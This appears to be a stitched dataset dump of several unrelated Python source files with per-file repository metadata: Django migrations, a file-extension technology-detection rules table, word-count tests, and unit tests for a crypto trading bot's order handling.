('page', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='test_nonparentalchildobjects', to='wagtail_localize_test.TestPage')),
],
options={
'abstract': False,
'unique_together': {('translation_key', 'locale')},
},
),
migrations.CreateModel(
name='TestChildObject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('translation_key', models.UUIDField(default=uuid.uuid4, editable=False)),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('field', models.TextField()),
('locale', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='wagtailcore.Locale')),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='test_childobjects', to='wagtail_localize_test.TestPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
'unique_together': {('translation_key', 'locale')},
},
),
]
| 64.844595
| 1,051
| 0.634469
| 943
| 9,597
| 6.281018
| 0.126193
| 0.078001
| 0.106196
| 0.070235
| 0.863414
| 0.863414
| 0.815465
| 0.796893
| 0.757724
| 0.718217
| 0
| 0.006637
| 0.215067
| 9,597
| 147
| 1,052
| 65.285714
| 0.779636
| 0.004689
| 0
| 0.628571
| 1
| 0
| 0.202304
| 0.072984
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.078571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cb59bb63d7c6bcbc99189e814c1f5117d475e38d
| 2,882
|
py
|
Python
|
lookatweb/rules/ext.py
|
ivbeg/lookatweb
|
b98e3ebd29c00e2f718c3392bb31b7202aa82a99
|
[
"BSD-3-Clause"
] | 2
|
2018-01-18T13:22:29.000Z
|
2018-02-03T13:10:20.000Z
|
lookatweb/rules/ext.py
|
ivbeg/lookatweb
|
b98e3ebd29c00e2f718c3392bb31b7202aa82a99
|
[
"BSD-3-Clause"
] | null | null | null |
lookatweb/rules/ext.py
|
ivbeg/lookatweb
|
b98e3ebd29c00e2f718c3392bb31b7202aa82a99
|
[
"BSD-3-Clause"
] | null | null | null |
from .consts import *
# File extensions complex rules
EXT_COMPLEX_RULES = [
{'type' : RULETYPE_EQUAL, 'text' : 'php',
'entities' : [
{'name' : 'web:tech:lang/php'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'py',
'entities' : [
{'name' : 'web:tech:lang/python'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'phtml',
'entities' : [
{'name' : 'web:tech:lang/php'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'php3',
'entities' : [
{'name' : 'web:tech:lang/php'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'php4',
'entities' : [
{'name' : 'web:tech:lang/php'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'php5',
'entities' : [
{'name' : 'web:tech:lang/php'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'do',
'entities' : [
{'name' : 'web:tech:/jsp'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'jsp',
'entities' : [
{'name' : 'web:tech/jsp'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'asp',
'entities' : [
{'name' : 'web:tech:lang/asp'},
{'name' : 'web:os/windows'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'aspx',
'entities' : [
{'name' : 'web:tech:lang/aspnet'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'cfm',
'entities' : [
{'name' : 'web:tech:lang/coldfusion'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'cfml',
'entities' : [
{'name' : 'web:tech:lang/coldfusion'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'cfmx',
'entities' : [
{'name' : 'web:tech:lang/coldfusion'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'cfc',
'entities' : [
{'name' : 'web:tech:lang/coldfusion'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'cgi',
'entities' : [
{'name' : 'web:tech/cgi'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'axd',
'entities' : [
{'name' : 'web:tech:lang/aspnet'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'php',
'entities' : [
{'name' : 'web:tech:lang/php'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'nsf',
'entities' : [
{'name' : 'web:tech/lotusdomino'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'php',
'entities' : [
{'name' : 'web:tech:lang/php'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'php',
'entities' : [
{'name' : 'web:tech:lang/php'},
]
},
{'type' : RULETYPE_EQUAL, 'text' : 'php',
'entities' : [
{'name' : 'web:tech:lang/php'},
]
},
]
| 25.732143
| 50
| 0.409785
| 241
| 2,882
| 4.804979
| 0.165975
| 0.132988
| 0.30829
| 0.380829
| 0.783247
| 0.743523
| 0.743523
| 0.743523
| 0.743523
| 0.669257
| 0
| 0.001664
| 0.374393
| 2,882
| 111
| 51
| 25.963964
| 0.640599
| 0.010062
| 0
| 0.376147
| 0
| 0
| 0.312171
| 0.033672
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009174
| 0
| 0.009174
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb9eb7fe70e64c8408cf69bf7cd437f1e412ea17
| 2,197
|
py
|
Python
|
exercise_3/test_solution.py
|
jeff-a-holland/python_class_2021_B2
|
e1dd93d50f332734954091c26c9a5ea7eb5251e7
|
[
"MIT"
] | null | null | null |
exercise_3/test_solution.py
|
jeff-a-holland/python_class_2021_B2
|
e1dd93d50f332734954091c26c9a5ea7eb5251e7
|
[
"MIT"
] | null | null | null |
exercise_3/test_solution.py
|
jeff-a-holland/python_class_2021_B2
|
e1dd93d50f332734954091c26c9a5ea7eb5251e7
|
[
"MIT"
] | null | null | null |
#!/Users/jeff/.pyenv/shims/python
from solution import count_words_sequential, count_words_threading
def test_non_threaded_empty_dir(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
assert 0 == count_words_sequential(str(test_directory / '*.txt'))
def test_non_threaded_dirname(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
test_subdir = test_directory / 'subdir'
test_subdir.mkdir()
assert 0 == count_words_sequential(str(test_directory / '*d*'))
def test_non_threaded_one_empty_file(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
with open(test_directory / f'mytestfile.txt', 'w') as f:
f.write('')
assert 0 == count_words_sequential(str(test_directory / '*.txt'))
def test_non_threaded_five(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
s = 'abc def ghi jkl mno'
for filename in ['abc', 'def', 'ghi']:
with open(test_directory / f'{filename}.txt', 'w') as f:
f.write(s)
assert 15 == count_words_sequential(str(test_directory / '*.txt'))
def test_threaded_empty_dir(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
assert 0 == count_words_threading(str(test_directory / '*.txt'))
def test_threaded_dirname(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
test_subdir = test_directory / 'subdir'
test_subdir.mkdir()
assert 0 == count_words_threading(str(test_directory / '*d*'))
def test_threaded_one_empty_file(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
with open(test_directory / f'mytestfile.txt', 'w') as f:
f.write('')
assert 0 == count_words_threading(str(test_directory / '*.txt'))
def test_threaded_five(tmp_path):
test_directory = tmp_path / 'testfiles'
test_directory.mkdir()
s = 'abc def ghi jkl mno'
for filename in ['abc', 'def', 'ghi']:
with open(test_directory / f'{filename}.txt', 'w') as f:
f.write(s)
assert 15 == count_words_threading(str(test_directory / '*.txt'))
| 27.123457
| 70
| 0.686391
| 298
| 2,197
| 4.738255
| 0.16443
| 0.276204
| 0.062323
| 0.113314
| 0.93272
| 0.93272
| 0.921388
| 0.901558
| 0.901558
| 0.839943
| 0
| 0.005596
| 0.186618
| 2,197
| 80
| 71
| 27.4625
| 0.784555
| 0.014565
| 0
| 0.734694
| 0
| 0
| 0.109057
| 0
| 0
| 0
| 0
| 0
| 0.163265
| 1
| 0.163265
| false
| 0
| 0.020408
| 0
| 0.183673
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cbc0b0595e9c2d3523d50e6c51b7eace108b4d12
| 14,240
|
py
|
Python
|
tests/unit_tests/trading_tests/test_trader.py
|
CryptoRichy/OctoBot
|
1ca5bd2ba4b8fc09859518fcb2a62f74a1435019
|
[
"Apache-2.0"
] | 1
|
2018-11-26T16:43:36.000Z
|
2018-11-26T16:43:36.000Z
|
tests/unit_tests/trading_tests/test_trader.py
|
CryptoRichy/OctoBot
|
1ca5bd2ba4b8fc09859518fcb2a62f74a1435019
|
[
"Apache-2.0"
] | null | null | null |
tests/unit_tests/trading_tests/test_trader.py
|
CryptoRichy/OctoBot
|
1ca5bd2ba4b8fc09859518fcb2a62f74a1435019
|
[
"Apache-2.0"
] | null | null | null |
import ccxt
import copy
from trading.exchanges.exchange_manager import ExchangeManager
from config.cst import *
from tests.test_utils.config import load_test_config
from trading.trader.order import *
from trading.trader.order_notifier import OrderNotifier
from trading.trader.trader import Trader
from trading.trader.trader_simulator import TraderSimulator
from trading.trader.portfolio import Portfolio
class TestTrader:
DEFAULT_SYMBOL = "BTC/USDT"
@staticmethod
def init_default():
config = load_test_config()
exchange_manager = ExchangeManager(config, ccxt.binance, is_simulated=True)
exchange_inst = exchange_manager.get_exchange()
trader_inst = TraderSimulator(config, exchange_inst, 2)
return config, exchange_inst, trader_inst
@staticmethod
def stop(trader):
trader.stop_order_manager()
def test_enabled(self):
config, _, trader_inst = self.init_default()
self.stop(trader_inst)
config[CONFIG_TRADER][CONFIG_ENABLED_OPTION] = True
assert Trader.enabled(config)
config[CONFIG_TRADER][CONFIG_ENABLED_OPTION] = False
assert not Trader.enabled(config)
def test_get_risk(self):
config, exchange_inst, trader_inst = self.init_default()
self.stop(trader_inst)
config[CONFIG_TRADER][CONFIG_TRADER_RISK] = 0
trader_1 = Trader(config, exchange_inst)
assert trader_1.get_risk() == CONFIG_TRADER_RISK_MIN
self.stop(trader_1)
config[CONFIG_TRADER][CONFIG_TRADER_RISK] = 2
trader_2 = Trader(config, exchange_inst)
assert trader_2.get_risk() == CONFIG_TRADER_RISK_MAX
self.stop(trader_2)
config[CONFIG_TRADER][CONFIG_TRADER_RISK] = 0.5
trader_2 = Trader(config, exchange_inst)
assert trader_2.get_risk() == 0.5
self.stop(trader_2)
def test_cancel_order(self):
_, _, trader_inst = self.init_default()
# Test buy order
market_buy = BuyMarketOrder(trader_inst)
market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
self.DEFAULT_SYMBOL,
70,
10,
70)
assert market_buy not in trader_inst.get_open_orders()
trader_inst.get_order_manager().add_order_to_list(market_buy)
assert market_buy in trader_inst.get_open_orders()
trader_inst.cancel_order(market_buy)
assert market_buy not in trader_inst.get_open_orders()
self.stop(trader_inst)
def test_cancel_open_orders_default_symbol(self):
config, _, trader_inst = self.init_default()
# Test buy order
market_buy = BuyMarketOrder(trader_inst)
market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
self.DEFAULT_SYMBOL,
70,
10,
70)
# Test sell order
market_sell = SellMarketOrder(trader_inst)
market_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_MARKET],
self.DEFAULT_SYMBOL,
70,
10,
70)
# Test buy order
limit_buy = BuyLimitOrder(trader_inst)
limit_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_LIMIT],
self.DEFAULT_SYMBOL,
70,
10,
70)
# create order notifier to prevent None call
market_buy.order_notifier = OrderNotifier(config, market_buy)
market_sell.order_notifier = OrderNotifier(config, market_sell)
limit_buy.order_notifier = OrderNotifier(config, limit_buy)
trader_inst.get_order_manager().add_order_to_list(market_buy)
trader_inst.get_order_manager().add_order_to_list(market_sell)
trader_inst.get_order_manager().add_order_to_list(limit_buy)
assert market_buy in trader_inst.get_open_orders()
assert market_sell in trader_inst.get_open_orders()
assert limit_buy in trader_inst.get_open_orders()
trader_inst.cancel_open_orders(self.DEFAULT_SYMBOL)
assert market_buy not in trader_inst.get_open_orders()
assert market_sell not in trader_inst.get_open_orders()
assert limit_buy not in trader_inst.get_open_orders()
self.stop(trader_inst)
def test_cancel_open_orders_multi_symbol(self):
config, _, trader_inst = self.init_default()
# Test buy order
market_buy = BuyMarketOrder(trader_inst)
market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
"BTC/EUR",
70,
10,
70)
# Test buy order
limit_sell = SellLimitOrder(trader_inst)
limit_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_LIMIT],
"NANO/USDT",
70,
10,
70)
# Test sell order
market_sell = SellMarketOrder(trader_inst)
market_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_MARKET],
self.DEFAULT_SYMBOL,
70,
10,
70)
# Test buy order
limit_buy = BuyLimitOrder(trader_inst)
limit_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_LIMIT],
self.DEFAULT_SYMBOL,
70,
10,
70)
# create order notifier to prevent None call
market_buy.order_notifier = OrderNotifier(config, market_buy)
market_sell.order_notifier = OrderNotifier(config, market_sell)
limit_buy.order_notifier = OrderNotifier(config, limit_buy)
limit_sell.order_notifier = OrderNotifier(config, limit_sell)
trader_inst.get_order_manager().add_order_to_list(market_buy)
trader_inst.get_order_manager().add_order_to_list(market_sell)
trader_inst.get_order_manager().add_order_to_list(limit_buy)
trader_inst.get_order_manager().add_order_to_list(limit_sell)
assert market_buy in trader_inst.get_open_orders()
assert market_sell in trader_inst.get_open_orders()
assert limit_buy in trader_inst.get_open_orders()
assert limit_sell in trader_inst.get_open_orders()
trader_inst.cancel_open_orders(self.DEFAULT_SYMBOL)
assert market_buy in trader_inst.get_open_orders()
assert market_sell not in trader_inst.get_open_orders()
assert limit_buy not in trader_inst.get_open_orders()
assert limit_sell in trader_inst.get_open_orders()
self.stop(trader_inst)
def test_notify_order_close(self):
config, _, trader_inst = self.init_default()
# Test buy order
market_buy = BuyMarketOrder(trader_inst)
market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
"BTC/EUR",
70,
10,
70)
# Test buy order
limit_sell = SellLimitOrder(trader_inst)
limit_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_LIMIT],
"NANO/USDT",
70,
10,
70)
# Test stop loss order
stop_loss = StopLossOrder(trader_inst)
stop_loss.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.STOP_LOSS],
"BTC/USD",
60,
10,
60)
# create order notifier to prevent None call
market_buy.order_notifier = OrderNotifier(config, market_buy)
limit_sell.order_notifier = OrderNotifier(config, limit_sell)
stop_loss.order_notifier = OrderNotifier(config, stop_loss)
trader_inst.get_order_manager().add_order_to_list(market_buy)
trader_inst.get_order_manager().add_order_to_list(stop_loss)
trader_inst.get_order_manager().add_order_to_list(limit_sell)
trader_inst.notify_order_close(limit_sell, True)
trader_inst.notify_order_close(market_buy, True)
assert market_buy not in trader_inst.get_open_orders()
assert limit_sell not in trader_inst.get_open_orders()
assert stop_loss in trader_inst.get_open_orders()
self.stop(trader_inst)
def test_notify_sell_limit_order_cancel(self):
config, _, trader_inst = self.init_default()
initial_portfolio = copy.deepcopy(trader_inst.portfolio.portfolio)
# Test buy order
limit_buy = trader_inst.create_order_instance(order_type=TraderOrderType.BUY_LIMIT,
symbol="BQX/BTC",
current_price=4,
quantity=2,
price=4)
trader_inst.create_order(limit_buy, trader_inst.portfolio)
trader_inst.notify_order_close(limit_buy, True)
assert limit_buy not in trader_inst.get_open_orders()
assert initial_portfolio == trader_inst.portfolio.portfolio
self.stop(trader_inst)
def test_notify_sell_limit_order_cancel_one_in_two(self):
config, _, trader_inst = self.init_default()
initial_portfolio = copy.deepcopy(trader_inst.portfolio.portfolio)
# Test buy order
limit_buy = trader_inst.create_order_instance(order_type=TraderOrderType.BUY_LIMIT,
symbol="BQX/BTC",
current_price=4,
quantity=2,
price=4)
trader_inst.create_order(limit_buy, trader_inst.portfolio)
# Test second buy order
second_limit_buy = trader_inst.create_order_instance(order_type=TraderOrderType.BUY_LIMIT,
symbol="VEN/BTC",
current_price=1,
quantity=1.5,
price=1)
trader_inst.create_order(second_limit_buy, trader_inst.portfolio)
# Cancel only 1st one
trader_inst.notify_order_close(limit_buy, True)
assert limit_buy not in trader_inst.get_open_orders()
assert second_limit_buy in trader_inst.get_open_orders()
assert initial_portfolio != trader_inst.portfolio.portfolio
assert trader_inst.portfolio.portfolio["BTC"][Portfolio.AVAILABLE] == 8.5
assert trader_inst.portfolio.portfolio["BTC"][Portfolio.TOTAL] == 10
self.stop(trader_inst)
def test_notify_sell_limit_order_fill(self):
config, _, trader_inst = self.init_default()
initial_portfolio = copy.deepcopy(trader_inst.portfolio.portfolio)
# Test buy order
limit_buy = trader_inst.create_order_instance(order_type=TraderOrderType.BUY_LIMIT,
symbol="BQX/BTC",
current_price=0.1,
quantity=10,
price=0.1)
trader_inst.create_order(limit_buy, trader_inst.portfolio)
limit_buy.filled_price = limit_buy.origin_price
limit_buy.filled_quantity = limit_buy.origin_quantity
trader_inst.notify_order_close(limit_buy)
assert limit_buy not in trader_inst.get_open_orders()
assert initial_portfolio != trader_inst.portfolio.portfolio
assert trader_inst.portfolio.portfolio["BTC"][Portfolio.AVAILABLE] == 9
assert trader_inst.portfolio.portfolio["BTC"][Portfolio.TOTAL] == 9
assert trader_inst.portfolio.portfolio["BQX"][Portfolio.AVAILABLE] == 10
assert trader_inst.portfolio.portfolio["BQX"][Portfolio.TOTAL] == 10
self.stop(trader_inst)
def test_notify_order_close_with_linked_orders(self):
config, _, trader_inst = self.init_default()
# Test buy order
market_buy = BuyMarketOrder(trader_inst)
market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
"BTC/EUR",
70,
10,
70)
# Test buy order
limit_sell = SellLimitOrder(trader_inst)
limit_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_LIMIT],
"NANO/USDT",
70,
10,
70)
# Test stop loss order
stop_loss = StopLossOrder(trader_inst)
stop_loss.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.STOP_LOSS],
"BTC/USD",
60,
10,
60)
stop_loss.add_linked_order(limit_sell)
limit_sell.add_linked_order(stop_loss)
# create order notifier to prevent None call
market_buy.order_notifier = OrderNotifier(config, market_buy)
stop_loss.order_notifier = OrderNotifier(config, stop_loss)
limit_sell.order_notifier = OrderNotifier(config, limit_sell)
trader_inst.get_order_manager().add_order_to_list(market_buy)
trader_inst.get_order_manager().add_order_to_list(stop_loss)
trader_inst.get_order_manager().add_order_to_list(limit_sell)
trader_inst.notify_order_close(limit_sell)
assert market_buy in trader_inst.get_open_orders()
assert stop_loss not in trader_inst.get_open_orders()
assert limit_sell not in trader_inst.get_open_orders()
self.stop(trader_inst)
| 39.22865
| 98
| 0.619382
| 1,568
| 14,240
| 5.265944
| 0.070153
| 0.13322
| 0.064551
| 0.049049
| 0.865811
| 0.848008
| 0.828388
| 0.807436
| 0.786121
| 0.768197
| 0
| 0.012992
| 0.313553
| 14,240
| 362
| 99
| 39.337017
| 0.831714
| 0.033848
| 0
| 0.717647
| 0
| 0
| 0.008446
| 0
| 0
| 0
| 0
| 0
| 0.160784
| 1
| 0.047059
| false
| 0
| 0.039216
| 0
| 0.098039
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cbc78951b6a83518ca6ebb06c58b547a25edd18f
| 42
|
py
|
Python
|
app/api/__init__.py
|
smartcities-livinglab-udg/APP-SmartCheckIn
|
b0f3d6db53f4f0efa33b5be201ca56e8b721af78
|
[
"MIT"
] | null | null | null |
app/api/__init__.py
|
smartcities-livinglab-udg/APP-SmartCheckIn
|
b0f3d6db53f4f0efa33b5be201ca56e8b721af78
|
[
"MIT"
] | null | null | null |
app/api/__init__.py
|
smartcities-livinglab-udg/APP-SmartCheckIn
|
b0f3d6db53f4f0efa33b5be201ca56e8b721af78
|
[
"MIT"
] | null | null | null |
from app.api.v1 import mod_api as mod_api
| 21
| 41
| 0.809524
| 10
| 42
| 3.2
| 0.7
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0.142857
| 42
| 1
| 42
| 42
| 0.861111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1db3401e9635cf27cbdde5a074c99a848bb74212
| 16,537
|
py
|
Python
|
upload_split_file/migrations/0001_initial.py
|
uktrade/fadmin2
|
0f774400fb816c9ca30e30b25ae542135966e185
|
[
"MIT"
] | 3
|
2020-01-05T16:46:42.000Z
|
2021-08-02T08:08:39.000Z
|
upload_split_file/migrations/0001_initial.py
|
uktrade/fadmin2
|
0f774400fb816c9ca30e30b25ae542135966e185
|
[
"MIT"
] | 30
|
2019-11-28T15:16:35.000Z
|
2021-08-16T14:49:58.000Z
|
upload_split_file/migrations/0001_initial.py
|
uktrade/fadmin2
|
0f774400fb816c9ca30e30b25ae542135966e185
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.7 on 2021-12-09 11:49
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("previous_years", "0004_auto_20210707_1008"),
("forecast", "0008_amend_views_20210802_1439"),
("core", "0011_alter_historicaluser_first_name"),
]
operations = [
migrations.CreateModel(
name="SimpleHistoryUploadPaySplitCoefficient",
fields=[
(
"id",
models.BigIntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
("created", models.DateTimeField(blank=True, editable=False)),
("updated", models.DateTimeField(blank=True, editable=False)),
(
"directorate_code",
models.CharField(max_length=6, verbose_name="Directorate Code"),
),
(
"split_coefficient",
models.IntegerField(
default=0,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999),
],
),
),
("row_number", models.IntegerField(default=0)),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"financial_code_to",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="forecast.financialcode",
),
),
(
"financial_period",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="forecast.financialperiod",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"verbose_name": "historical upload pay split coefficient",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="SimpleHistoryPreviousYearPaySplitCoefficient",
fields=[
(
"id",
models.BigIntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
("created", models.DateTimeField(blank=True, editable=False)),
("updated", models.DateTimeField(blank=True, editable=False)),
(
"directorate_code",
models.CharField(max_length=6, verbose_name="Directorate Code"),
),
(
"split_coefficient",
models.IntegerField(
default=0,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999),
],
),
),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"financial_code_to",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="previous_years.archivedfinancialcode",
),
),
(
"financial_period",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="forecast.financialperiod",
),
),
(
"financial_year",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="core.financialyear",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"verbose_name": "historical previous year pay split coefficient",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="SimpleHistoryPaySplitCoefficient",
fields=[
(
"id",
models.BigIntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
("created", models.DateTimeField(blank=True, editable=False)),
("updated", models.DateTimeField(blank=True, editable=False)),
(
"directorate_code",
models.CharField(max_length=6, verbose_name="Directorate Code"),
),
(
"split_coefficient",
models.IntegerField(
default=0,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999),
],
),
),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"financial_code_to",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="forecast.financialcode",
),
),
(
"financial_period",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="forecast.financialperiod",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"verbose_name": "historical pay split coefficient",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="UploadPaySplitCoefficient",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created", models.DateTimeField(auto_now_add=True)),
("updated", models.DateTimeField(auto_now=True)),
(
"directorate_code",
models.CharField(max_length=6, verbose_name="Directorate Code"),
),
(
"split_coefficient",
models.IntegerField(
default=0,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999),
],
),
),
("row_number", models.IntegerField(default=0)),
(
"financial_code_to",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="to_upload_split_file_uploadpaysplitcoefficients",
to="forecast.financialcode",
),
),
(
"financial_period",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="upload_split_file_uploadpaysplitcoefficients",
to="forecast.financialperiod",
),
),
],
options={
"abstract": False,
"unique_together": {("financial_period", "financial_code_to")},
},
),
migrations.CreateModel(
name="PreviousYearPaySplitCoefficient",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created", models.DateTimeField(auto_now_add=True)),
("updated", models.DateTimeField(auto_now=True)),
(
"directorate_code",
models.CharField(max_length=6, verbose_name="Directorate Code"),
),
(
"split_coefficient",
models.IntegerField(
default=0,
validators=[
django.core.validators.MinValueValidator(0),
django.core.validators.MaxValueValidator(9999),
],
),
),
(
"financial_code_to",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="to_upload_split_file_previousyearpaysplitcoefficients",
to="previous_years.archivedfinancialcode",
),
),
(
"financial_period",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="upload_split_file_previousyearpaysplitcoefficients",
to="forecast.financialperiod",
),
),
(
"financial_year",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
to="core.financialyear",
),
),
],
options={
"unique_together": {
("financial_year", "financial_period", "financial_code_to")
},
},
),
migrations.CreateModel(
name="PaySplitCoefficient",
fields=[
(
"id",
